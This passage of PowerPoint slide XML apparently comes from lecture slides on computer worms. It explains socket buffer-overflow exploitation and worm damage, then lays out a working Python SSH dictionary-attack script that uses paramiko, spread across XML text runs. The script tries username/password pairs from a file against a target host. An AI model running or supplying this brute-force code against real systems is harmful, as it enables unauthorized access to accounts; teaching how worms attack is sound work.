            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>request for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>connection to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>server socket that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>constantly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>listening for such requests. If the server socket code is vulnerable to buffer overflow or other stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>corruption, attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>could manipulate that into the execution of certain system functions on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>machine that would allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>code to be downloaded into the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1433092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Damages by Worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In all cases, the extent of harm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>worm can carry out would depend on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> accorded to the guise under which the worm programs are executing. So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>worm manages to guess someone’s password on a remote machine (and that someone does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>superuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> privileges), the extent of harm done might be minimal </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Nevertheless, even when no local “harm” is done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, propagating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>worm can bog down a network and, if the propagation is fast enough, can cause a shutdown of the machines on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. This can happen particularly when the worm is not smart enough to keep a machine from getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reinfected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> repeatedly and simultaneously. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can only support a certain maximum number of processes running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>simultaneously)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Thus, even “harmless” worms can cause a lot of harm by bringing a network down to its knees </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88724890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9200" y="6477000"/>
            <a:ext cx="71628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Worm in Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SSHDictionaryAttack.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>AttackSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ipAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>dictionaryFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"[+] Attacking Host : %s " %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ipAddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko.SSHClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.set_missing_host_key_policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko.AutoAddPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>line in open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>dictionaryFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, "r").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>username, password] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>line.strip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>().split()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   try :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>     print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"[+] Trying to break in with username: %s password: %s " % (username, password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ipAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, username=username, password=password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko.AuthenticationException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>     print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"[-] Failed! ..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>     continue </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>: %s and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passoword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> %s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> VALID! " % (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   break</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>__ == "__main__" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>AttackSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
